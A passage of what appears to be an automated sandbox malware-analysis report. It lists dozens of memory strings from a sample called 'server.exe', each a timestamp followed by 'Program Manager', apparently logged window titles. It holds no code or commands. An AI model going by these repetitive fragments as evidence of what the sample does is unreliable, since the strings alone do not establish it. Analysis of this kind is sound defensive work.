Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 21:54:41 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 14:12:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 03:44:10 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 13:32:16 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 21:22:05 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 15:19:16 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 06:59:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 14:56:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/28 \| 00:01:00 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 17:57:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 20:04:30 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 07:13:58 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 16:39:13 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 14:30:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 11:20:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 06:00:26 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 07:20:41 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 23:57:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 12:10:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 04:20:50 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 07:12:28 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 14:59:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 06:53:30 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 23:32:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 03:32:40 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 02:06:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 01:42:20 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 17:33:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 16:25:07 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 08:00:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 17:55:32 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 15:18:33 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 10:16:49 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 21:25:02 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 00:27:20 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 14:05:54 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 22:22:48 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 22:10:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 23:40:22 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/19 \| 22:56:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 11:15:33 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 03:33:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 14:25:28 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 05:18:38 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 00:57:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 18:12:16 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 15:51:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 18:26:16 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 19:32:20 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 22:55:40 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 22:59:58 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 13:07:03 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 16:44:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 13:53:56 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 00:23:24 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 18:55:44 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 13:53:42 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 23:21:16 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 14:19:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/19 \| 23:19:03 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 08:08:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/20 \| 00:15:37 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 01:14:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/19 \| 23:09:44 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 13:30:41 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 20:43:37 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 14:01:31 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 01:24:21 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/28 \| 00:29:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 10:31:11 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 07:58:14 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 08:46:54 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/30 \| 07:20:03 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 10:21:05 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 07:00:24 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 07:36:05 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 08:24:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 10:11:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 12:45:52 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 15:56:01 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 18:13:15 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/07 \| 02:49:19 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 07:43:51 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 16:20:10 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 17:42:45 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/30 \| 04:09:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 07:01:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 07:36:52 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 20:07:16 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 13:14:47 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 15:09:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 05:43:05 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 05:37:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 03:57:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 21:24:48 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 07:07:44 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 13:48:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 20:55:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 23:11:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 06:00:12 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 21:24:23 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 01:56:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 16:00:55 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 19:53:13 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 23:17:17 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 02:03:03 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 22:49:23 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 14:08:31 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 06:52:25 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 21:38:23 - Program Manager
